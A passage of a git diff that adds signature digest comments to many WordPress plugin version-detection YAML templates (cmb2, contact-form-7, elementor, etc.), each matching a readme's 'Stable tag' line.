4a0a004730450220550a62b664c80bb3a191c3f914f48b43fe2fa627b04e9473ce32769bc93a9961022100e6763e3797911f7b483cd6e8489b5ff7eadcd76c5b4483807d24a3d4fe72b60f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4a..8ec465a529d 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205e19ad19c1de0e35bb88ba8b38a1d34ca17100fd5106f7892840703f277d23ed022100edb4b95a7f2c68a5b2aa1e2df6df4e8597a751e95164ce6bdef1ffe1194c972d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545d..9704d3bdc4f 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201435b6d9c4d926f108b8e4dc4030902de7bf7fd638dc817a0dc753c64d47696e02204e9ecb194d9d1014528aedda893f0dabc9ac80ef5cfc1543a8785a017d951e94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f181225..8fbf301aeea 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aac647d87b1dc22564132f538ae91918caf8d676cda7f94e6bd748714ce5fbe1022053cf242e74c1841ff2c0a355b86b165edb02464e1b66f6e57142e13c76a95674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d5369..b40772c800a 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e94e954f8ab15265bc272850ce5e21531c75b363d7917b1907188f085d6b378902210080b43ed897ac918703098dbadbe5526aa6af3d48b9eda3895c3a6a12e08d26b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1d..803c525878b 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204784fb5600ffd663ad2bff0bd813dc0740f08f5f69b1a04ae7bf3bcf23d18fe4022015371936d5cdc2f5629d00ac27398fbaeed3bd3b3b614a07b8520cb9b7ccdb89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc979..4cf1100abd6 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220030b1605a2148bf426b45dda43711c1d41c948c0242cbd769f4d3d8a2434036102210095c2b2fdf8fd937bc89aafc185187fadbdb2bc6566c0bb6284b6ad55ecb999c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f934..038e6619daa 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220649cc00b8752020c6ada49c61addff74a31d6d150cd86d66c090e89c1b6a816502206539c70f1f27639d3a93059b878eab9fb10d612e9fb3453f26c2ad52dcf64479:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf361..1a1ae3c440e 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bb0914fd3e1eec1f734722906ae3b3c298b9da5abc08d98d1274fa9df4cf1e8802210080e5e8e03353803b0fcea7f986ba2caed1c3d2077fe2ad6aef85e0499d86bfeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d26..27f321fecf7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210085fa5c61a020f03505e0a518b6b1bc2f05354dcb9685a0cf806c67c8291177820220790943a11d295a4af764d96d09a4603e8bf02a87c8756be5fad9783c9b577c27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86e..62bbb0b883e 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a8a908894c2494a6322820e9ac1d07883a0019d3df3e11f685b5cb06beacaeaf022100ad0d5adfe0b6dfac60a257749031bda3a46d98941449418173814d4ac20fb064:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b6..e4b5536e84a 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009e077c85747996fcec2037f426938a40b82fbe10914df0184e5ca7e2736ef3f502207658548bfc080f39b2b770df08454856bb19c87591f0beb623aca9fdfd9ecb51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b0..065a95456e9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220724e7b4aee59c4ea617c59bc2fa442009cb1ef16527ac5e71fd224208092a280022061e345736f255b9a1cfd67087056155880e3648cd43f6bdeeb5185bcf930c764:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566f..6ffdcae5240 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200a48cd636d3048eab3157d063d4e35af4d1646a0c230f4f1cb040b1ca0943233022100f16243d95c799e0c8ebc6cbbcee5039316b1cddc152b060ff45bb5087f84fc52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a154..91c580f389f 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008f926ca83c02a199013f4eeea6a7ea7f75f0b2578ea2becba0f87e6b1cf27a1b022100bed67dbd2468de67325cbd23b57be9de2c8eb97e19d1d4a4b41d52193858c118:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f2..33b88b8b665 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204f8fa4f6528634198fc92c04b0fa411c50e3ebe0269959caa8fa91ef750b1e99022062476d32dc5337a1e1f20a2443141b44370adb686e8650cc57f5c5777e54f062:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c920917673..e68a4ff4f9b 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ffd38d548b60af8903f22f5cd8b6145133673c51e51ea0ba0a60e8fde33898a022032b92b60ffa578397b3d449f5959847f7a80b475f3258e760b445e69d97e3b37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9ce..ac6e4fa5000 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f396796023ce2494b9212462490c32a4f05637c9e95b0d3f3784461a7a920cf4022012eea0f57c50533a7e25976c0bda1c2d58211766ed64478180c51fe7239b9d77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05e..eaa6055705f 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206647404eed2a17708f789c643a269d9a972e8c3806e9ccd2e3972415b903d6bb02210096e8ed55043e9d0fe709895b301485a48359c769663a3e391f9a4478304556bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce34093..9079d50df27 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008f7d4586849b93fd153002dc2a3022ff105ab0948d0fbd467ddf633d93a5d33a022064b62e813fe732b75527a4b8e5773fb71a98ff91ee883b050daa092e3896fb24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8dad..e9dc6baad19 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022036cc66d181fb06ce72a320b042b7d550382a8cfa3efbb23700c6789f86f7237e0221009086fa6d73425624829c00e7a79119a09c14539aea7e0e9dbed0e952c647221a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eba..af1cbb5cf8c 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022000b14f288c81f9421b2c30b343f631d99c436c250edaf810f084224c1adee4cc0220352e66a35411c9883500585d77937335e9c844c6f0454e699c8429468703242e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df5..5c6d0b995c0 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210091e2e8b922c8a2026e6602cad8b94edcdf612fed6afa4a2e6af0613c2909558302206e61b7d2203ba5b26d018001e0c8761a682b1949d58611cd0e2fa940c1866f1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73ed..2c9e58e1c58 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b885cd246f9fb3216f360417f9e86e4781c6a614edb92dd43d55fadd4b115657022066301b2be2a4ca80d489db7e3ae5b9bf620c11283e4dfa95de8b0781ac0e5572:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f00931279..8eca733fa97 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220103fe5c28ad3ac28cb238e54d600b136fd135520a3e33b3bca96bb21d76a45af022100bd35203cbe8aea1f3fb804c43f34cb6a666e1356cf3fa21ed91b1a4bead4371d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d6..804e0a64b3f 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fb74667a3b653dfac98bd348a2e3dea60c627366145def6eb65e7b22ffcf6e1d02210099746b49689cdc5fe242d9a789f8995b82889c40264aa820089b6c339d76f055:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d8..919e7838794 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f6accdbfccd442da9a0430f5a15e3f682c2db0b9b7d190d79a4a8cf8dc489051022100994bb2518264867bda598c47384d06dbb5fb0ca8ebba776765a59b61b3f51adc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ace..88c9255d636 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022068a08f68017ddf6a92c6752d7913e7d0630497b14817f15cefd84d69bb54f37802202dcafeb04a3bc9c2452487d7cb7cdd0600b5abf41bb25049491aed0c66bc5d05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736fd..7aa1c995aed 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022029cbb84d9753207b18fe550ed6c5f26c1472fed014e408c91b903e705d81fd46022064f5b4779f2ab2c414f007a1ab093d74608e470f104794237a9b0c54fff5e657:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b24789..84d1a3c0f2c 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207f043fd5fa3349fd243eecf64fd67b8a86564d88ef94ec7346fa108e89788cad022100a8484d125349c90c9b11f76983b5c89e4e4f27f3644bd6d899e92c35b38f4d00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6d..26a7ab1381a 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100df97bbba45f43516c28f7559b51dea13b23e354a163006d14a6bfd3b2c6a514b022012cb2669d4267f8ddcf014c5ab48dfdc6cbe70326b3edc03b8e3367c3fe32ea6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d578..4edb7b77ad1 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f627ee87b0a111c81039f054a65e8ed24c319fd04029b98a38269655cc81a914022100ed088677b7cf4d24d94851deb2ec72feeb772f1cbffe9b1d2a797e1437dca62f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a90..08285411282 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008017f11f633f13e08b8d231d95e8a66cd0398df41b6dba40c8344da5e4d4f61602203a222d82cf95d18df709be0af986c0b73e0ba3dbec8e74a984ee62e1138f04e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415d..ec01702d316 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008b824556500fe06c2369b62667587ef060da943470a34116c2612997c869b29e022100be277a0777ec4259cfa64f0e836ab9aac9406ad633c0eb4823ab13428816bbe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d2..0ac50c7314d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022061b684b6ace70738b9880c5f8e897231e015b6db0dc0c7b5257ff0e8b81fc6b7022100d79c3ac7cd7e454377234fedb4b618952c1a84aac54ac3da9b9d0d656473acd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03c..0065f436151 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 480a004530430220381ad88368fd5554f56505dbc7fbb2a28186cb3e7336272e36d3af3392eac7dd021f614302bb216c10edb6549d3e740daad905f3dc2056986dc7843cff1fadbf5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9c..dedb6d5d513 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022079bb853a4a0cee414cc04176eb95725e4c3f7c930132761c159ff66fc4fe12d802206e7ae07ac119f0a50c59908c36d50b1d68dd2079bd26cd60d3262de7813e995b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc670..4f4741ab15d 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207e72baefdc21360e1c727e9912a5560abbd45f65a48586c0995aa13fe8720008022053906610511a39d3ab476b6d4b0b0ea085d8f19657f27e56b3933f111d03f2e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde5..12ba6ea72a1 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a2e220dadab75ca56250423357fb28228696421df601f8cdd9c41ac4918dd6ec0220211686b133e1ba0b61794ad682fbd51500a70fd5ca6ed596f610201b738a109f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7d..fe484765505 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017e742c7125f4e530302578b6f9008547e274e1247448c72352561433b8bae1f022100a1c5db93ae7d9ef2f2492e9598d68898dc34b603ac4890fbeda3d7da2e3f8c3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea24..e172b25317a 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c3a8d06708e4779fa04e3122480e7733957436e3ef912225af741191f6434963022032271bd6e6ae8a57a47108403cb114f73f828e027120600a8a5b4ce22eadb5b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c7..a8a2534f692 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022016f1e8a8e7bfa27404655073880a91535d35cd9cd4f120c2fb50762809f57dab0221009628bfa0a7804b25bf2740399b6a57a15f20d416a5e31e6b064c8b2599a26381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f64..2c382fe9222 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eea30c5e2d372a45905121d1397b38adb7d0a7f0982996c8b492c5b1fd7f5af002203dd2bf76883dd41ec20b617c74370020014013cca19754efd68888f12983ad73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff4..f6068a5a396 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009a721a748dec3cb189dd1c8b409339aec87a00b15b3c069a8a505bd02e993f13022100cc4cc4c153fe551cef5d6313b92bea7472e37be68637cae0c0292b9655715ade:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1c..f2b79c186a3 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210098181c08941bd8ad4247b9b4c32ad04b61bd4b71dadf164a94aa8f10a858813a022067b117788915718cb4a37ae68999a114548c7c9513355fabcf9a7ac16a3d3802:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751b..ef0b86899f6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b8b5e58e8caf38be8445341c6c08487a77f136da60d59c5ebf9fe8457c1fd222022100cdf24d7b2e6838058d3bb619802fbc9673aec925f45bbaff69ed52ef1c72d787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e47..d9d78624732 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022079b9363108db9cb5fafe22adbd418c6e415e79f5733a5f3f403c7c4ac9c1724e0221009351fab80b2e98dbd64df962eecd64b076ddeb5895e965054bb49befa24bbbae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb76..d16447f8bdb 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ 